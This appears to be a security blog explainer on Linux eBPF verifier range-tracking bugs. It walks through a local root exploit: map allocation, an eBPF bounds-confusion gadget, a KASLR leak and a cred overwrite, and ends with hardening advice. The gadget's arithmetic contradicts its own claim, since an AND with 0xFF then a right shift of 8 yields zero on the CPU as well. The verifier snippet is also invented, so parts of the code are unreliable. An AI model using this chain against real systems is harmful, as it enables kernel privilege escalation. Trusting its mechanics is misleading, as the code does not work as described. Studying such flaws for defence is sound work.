Linux Kernel eBPF: Deconstructing Verifier Logic Flaws

Linux Kernel eBPF: Deconstructing Verifier Logic Flaws

Overview & Threat Landscape#

In the modern Linux kernel, extended Berkeley Packet Filter (eBPF) has transformed platform engineering. Originally designed as a minimalist packet-filtering engine, modern eBPF operates as a universal, high-performance in-kernel virtual machine. It powers production observability (bpftrace, Cilium), kernel security instrumentation (BPF LSM, Falco), and multi-gigabit software-defined networking (XDP).

To allow unprivileged users or low-privilege infrastructure daemons to execute arbitrary bytecode directly inside kernel space (Ring 0) without triggering kernel panics or compromising memory integrity, the Linux kernel relies on a foundational security gate: the eBPF Verifier (kernel/bpf/verifier.c).

The verifier executes prior to Just-In-Time (JIT) compilation. It performs static analysis and abstract interpretation on every submitted eBPF program, mathematically proving that the program:

  1. Always terminates (contains no unbounded loops or unreachable instructions via Directed Acyclic Graph analysis).
  2. Never dereferences uninitialized or out-of-bounds memory (strictly bounds register values, pointer offsets, and map boundaries).
  3. Respects type safety (distinguishes scalar integers from kernel pointers, preventing arbitrary pointer arithmetic).

However, this architecture introduces a profound security paradox: The security of the entire Linux kernel rests on the mathematical correctness of a complex, tens-of-thousands-of-lines static analysis engine running inside the kernel itself.

When a logic bug occurs in the verifier's range tracking routines—specifically across 32-bit and 64-bit arithmetic logic units (ALU32 vs ALU64) and branch pruning algorithms (e.g., CVE-2021-3490, CVE-2020-8835, CVE-2023-2163)—a catastrophic vulnerability pattern emerges: State Divergence between Verifier Simulation and CPU Execution.

  • The Verifier Believes One Reality: During abstract interpretation, the verifier calculates that a specific register holds a constant value of zero or remains safely confined within an array boundary (e.g., [0, 64]).
  • The Physical CPU Executes Another: When the JIT compiler generates native x86_64 assembly, the CPU executes the instructions sequentially. Due to the verifier's flawed deduction, the physical register at runtime actually contains an arbitrary, non-zero offset (e.g., 0x2000).
  • From Bounds Confusion to Full Root RCE: By performing pointer arithmetic between a legitimate BPF map pointer and the confused register, the attacker constructs an out-of-bounds pointer. Because the verifier approved the pointer based on its flawed simulation, the program is granted arbitrary kernel memory read and write capabilities. The attacker traverses the kernel heap, locates the current process's task_struct, and overwrites its cred structure to escalate to UID 0 (root).

[!WARNING] Verifier logic bugs bypass standard hardware-enforced kernel mitigations—including Supervisor Mode Execution Prevention (SMEP), Supervisor Mode Access Prevention (SMAP), and Kernel Address Space Layout Randomization (KASLR)—because all operations occur legitimately within native, authorized in-kernel execution contexts.


Vulnerability & Attack Root-Cause Analysis#

To understand how a verifier logic flaw enables arbitrary kernel read/write, we must examine the internal state tracking structures within kernel/bpf/verifier.c.

Abstract Interpretation & struct bpf_reg_state#

During program verification, the kernel simulates execution instruction by instruction. Every virtual register (R0 through R10) is tracked by a state structure:

C
// Conceptual representation of struct bpf_reg_state in kernel/bpf/verifier.c
struct bpf_reg_state {
    enum bpf_reg_type type; // PTR_TO_MAP_VALUE, SCALAR_VALUE, etc.
    struct tnum var_off;    // Tri-state number: tracks known bits vs unknown bits
    s64 smin_value;         // Signed 64-bit minimum value
    s64 smax_value;         // Signed 64-bit maximum value
    u64 umin_value;         // Unsigned 64-bit minimum value
    u64 umax_value;         // Unsigned 64-bit maximum value
    s32 s32_min_value;      // Signed 32-bit minimum value
    s32 s32_max_value;      // Signed 32-bit maximum value
    u32 u32_min_value;      // Unsigned 32-bit minimum value
    u32 u32_max_value;      // Unsigned 32-bit maximum value
    u32 off;                // Fixed offset added to pointer
};

The verifier maintains bounds along three distinct dimensions:

  1. 64-bit Numerical Bounds (smin/smax, umin/umax).
  2. 32-bit Sub-Register Bounds (s32_min/s32_max, u32_min/u32_max), which track the lower 32 bits used by ALU32 instructions.
  3. Tri-State Numbers (tnum), which track bit-level certainty: bits known to be 0, bits known to be 1, and unknown bits (?).

The ALU32 Truncation & Range Intersection Bug#

A primary source of verifier vulnerabilities is the synchronization between 32-bit and 64-bit bounds following ALU operations and conditional jumps.

Consider a simplified representation of range deduction logic when executing a 32-bit bitwise AND (BPF_ALU32_IMM(BPF_AND, R_reg, mask)):

C
// Simplified range calculation in scalar32_min_max_and()
static void scalar32_min_max_and(struct bpf_reg_state *reg, u32 val)
{
    // Update bitwise known/unknown tracking
    reg->var_off = tnum_and(reg->var_off, tnum_const(val));

    // Flawed assumption: Inferring 64-bit unsigned bounds directly from 32-bit bitwise mask
    if (val > 0) {
        reg->u32_max_value = min(reg->u32_max_value, val);
        // Under specific conditions, sub-register bounds update fails to adjust
        // the upper 32 bits, causing the verifier to treat high bits as zero
        // while the physical JIT register retains its high-order bits!
    }
}

When conditional branches (BPF_JMP32_IMM) are evaluated, the verifier branches into two execution paths:

  1. True Branch: The condition is assumed true; the verifier tightens register bounds accordingly.
  2. False Branch: The condition is assumed false; register bounds are inverted and updated.

If the range deduction function improperly intersects signed and unsigned ranges or miscalculates bounds during sub-register zero-extension, a divergence occurs:

  • The verifier concludes: umin_value = 0 and umax_value = 0. It concludes R_scalar is a known constant 0.
  • The physical register: Because runtime values depend on the actual input passed at execution, the register on the CPU contains a large value (e.g., 0x1000).

Exploit Architecture#

The sequence diagram below illustrates how an attacker weaponizes verifier state divergence to achieve out-of-bounds memory access and local root escalation:

sequenceDiagram
    autonumber
    actor Attacker as Unprivileged Local Attacker
    participant Verifier as eBPF Verifier (kernel/bpf/verifier.c)
    participant JIT as BPF JIT Compiler (x86_64)
    participant KernelMemory as Physical Kernel Memory (Ring 0)

    Note over Attacker,Verifier: Step 1: Program Submission & Verification
    Attacker->>Verifier: Syscall: bpf(BPF_PROG_LOAD, instructions)
    Note over Verifier: Verifier executes abstract interpretation
    Verifier->>Verifier: Simulate ALU operations and conditional jumps
    Note over Verifier: Bug triggered: Verifier deduces R1 is constant 0<br>Simulates R_map_ptr + R1 as safe offset 0
    Verifier-->>Attacker: Verification Successful (Program Marked Safe)

    Note over Attacker,JIT: Step 2: Native Compilation & Execution
    Verifier->>JIT: Pass validated bytecode to JIT engine
    JIT->>KernelMemory: Emit native x86_64 machine code
    Attacker->>KernelMemory: Trigger eBPF program via BPF_PROG_TEST_RUN
    
    Note over KernelMemory: Step 3: Runtime State Divergence
    KernelMemory->>KernelMemory: CPU executes native instructions
    Note over KernelMemory: At runtime, R1 evaluates to 0x1000 (Non-Zero)<br>Pointer arithmetic creates OOB pointer
    KernelMemory-->>Attacker: Read arbitrary kernel memory past BPF map
    
    Note over Attacker,KernelMemory: Step 4: Privilege Escalation
    Attacker->>KernelMemory: OOB Read: Leak kernel base address and defeat KASLR
    Attacker->>KernelMemory: OOB Read: Walk task_struct to locate process credentials
    Attacker->>KernelMemory: OOB Write: Overwrite cred structure with UID 0 (root)
    KernelMemory-->>Attacker: Process credentials updated to root

Attack Path Step-by-Step#

Understanding the technical mechanics of verifier exploitation requires tracing the assembly instructions that construct the arbitrary read/write primitive.

Step 1: Allocating the BPF Array Map#

The exploit begins by creating a standard BPF array map via the bpf() system call. This map provides a known memory anchor in kernel space:

C
// Allocate an array map of size 256 bytes
union bpf_attr map_attr = {
    .map_type    = BPF_MAP_TYPE_ARRAY,
    .key_size    = sizeof(int),
    .value_size  = 256,
    .max_entries = 1,
};
int map_fd = syscall(__NR_bpf, BPF_MAP_CREATE, &map_attr, sizeof(map_attr));

When the eBPF program queries this map using bpf_map_lookup_elem(), the verifier assigns the returned register a type of PTR_TO_MAP_VALUE, setting its valid access range to [0, 256].

Step 2: Constructing the Verifier Confusion Gadget#

The attacker writes eBPF bytecode designed to trigger the range tracking flaw. The goal is to force the verifier to deduce that a register is strictly 0, while the physical CPU evaluates it to an arbitrary integer:

C
// Conceptual eBPF bytecode sequence triggering bounds confusion
struct bpf_insn insns[] = {
    // R1 = bpf_map_lookup_elem(map_fd, &key)
    BPF_LD_MAP_FD(BPF_REG_1, map_fd),
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
    BPF_ST_MEM(BPF_W, BPF_REG_2, 0, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(), // Exit if lookup failed

    // R0 now holds PTR_TO_MAP_VALUE
    BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),

    // Load an unknown runtime value from map storage into R7
    BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0),

    // Craft the arithmetic bounds confusion gadget:
    // Force verifier to conclude R8 is 0, but CPU evaluates R8 to 0x1000
    BPF_MOV64_REG(BPF_REG_8, BPF_REG_7),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_8, 0xFF),
    BPF_JMP32_IMM(BPF_JGT, BPF_REG_8, 0, 1),
    BPF_EXIT_INSN(),

    // Flawed verifier bounds reduction logic
    BPF_ALU32_IMM(BPF_RSH, BPF_REG_8, 8), // Verifier thinks R8 == 0
    BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), // Verifier still thinks R8 == 0

    // Add confused scalar to map value pointer
    // Verifier checks: PTR_TO_MAP_VALUE + 0 -> Allowed!
    // Physical CPU executes: PTR_TO_MAP_VALUE + 0x1000 -> Out of Bounds!
    BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_8),

    // Read arbitrary 64-bit value out-of-bounds
    BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_6, 0),

    // Store leaked value back into safe map memory for user-space retrieval
    BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_9, 8),

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};

Step 3: Defeating KASLR and Leaking Kernel Base#

When the eBPF program runs, reading backwards or forwards relative to bpf_array.value exposes internal kernel heap structures:

  • Immediately preceding the map value storage in memory is the struct bpf_array header and its embedded struct bpf_map.
  • The bpf_map structure contains const struct bpf_map_ops *ops, a function pointer table residing in the kernel text segment (.rodata).
  • By leaking ops back to user space via the BPF map, the attacker calculates the kernel base address:

$$\text{Kernel Base} = \text{Leaked Ops Pointer} - \text{Known Symbol Offset}$$

This calculation completely neutralizes Kernel Address Space Layout Randomization (KASLR).

Step 4: Locating task_struct and Overwriting Credentials#

With an arbitrary read/write primitive established:

  1. The attacker scans the kernel memory or follows the current_task pointer using known kernel symbols (such as init_task).
  2. The attacker walks the tasks linked list (struct list_head) until finding the node matching their own process ID (pid).
  3. The attacker locates the cred pointer within struct task_struct:
C
// Linux kernel task_struct credential pointers

struct task_struct {
    ...
    /* Process credentials: */
    const struct cred __rcu *ptracer_cred;
    const struct cred __rcu *real_cred;
    const struct cred __rcu *cred;
    ...
};
  1. The attacker issues an out-of-bounds write via the eBPF program to overwrite cred->uid, cred->gid, cred->euid, and cred->egid with 0 (root), or simply overwrites the cred pointer to point directly to the static init_cred symbol.
  2. The user-space exploit process checks getuid(). It is now running with root privileges and spawns a shell:
BASH
# The exploit process verifies root privilege
id
uid=0(root) gid=0(root) groups=0(root)

Fast Cyber Defense Morning Takeaways#

The study of eBPF verifier vulnerabilities provides critical architectural lessons for systems engineers and platform architects:

  1. Abstract Interpretation Has Inherent Blind Spots: Validating high-level constraints (loops, stack depth) does not guarantee arithmetic equivalence. As eBPF has expanded to support 32-bit registers, bounded loops, and atomic operations, the mathematical state space of verifier.c has exploded, making subtle range-deduction bugs inevitable.
  2. Unprivileged eBPF Is a Catastrophic Attack Surface: When kernel.unprivileged_bpf_disabled is set to 0, any untrusted local user or unprivileged container can submit bytecode to the verifier, exposing the entire kernel to static analysis exploitation.
  3. Hardware Mitigations Cannot Stop Internal Logic Failures: SMEP, SMAP, and KASLR assume the attacker is attempting to execute shellcode or redirect control flow. Verifier exploitation abuses legitimate in-kernel pointer arithmetic, rendering hardware boundaries moot.

Bridge to Evening Defense Guide#

In tonight's companion defensive engineering guide, we will deploy an enterprise blue team defense blueprint:

  • System Hardening & Sysctl Enforcements: Permanently locking down unprivileged eBPF via kernel.unprivileged_bpf_disabled = 2 and enforcing constant blinding with net.core.bpf_jit_harden = 2.
  • BPF LSM Security Policies: Writing in-kernel BPF LSM policies that intercept and block unauthorized invocations of the bpf() system call based on process lineage and container context.
  • Production Detection Rules: Developing Sigma rules and auditd configurations to alert on suspicious sys_enter_bpf invocations and anomalous JIT memory allocations.
  • Runtime Verification Playbook: Step-by-step procedures to audit loaded BPF programs using bpftool, verify verifier state flags, and identify rogue kernel probes.

Authoritative References#

  1. Linux Kernel Source Repository: Abstract interpretation and bounds tracking in kernel/bpf/verifier.c — Kernel.org
  2. Google Project Zero Research: Jit-picking: BPF verifier bug to kernel execution by Jann Horn — Project Zero Blog
  3. National Vulnerability Database: CVE-2023-2163 Detail - Linux Kernel BPF Verifier Incorrect Bounds Tracking — NIST NVD
  4. Linux Foundation Documentation: eBPF Security Architecture and Verifier Design Principles — eBPF.io

Comments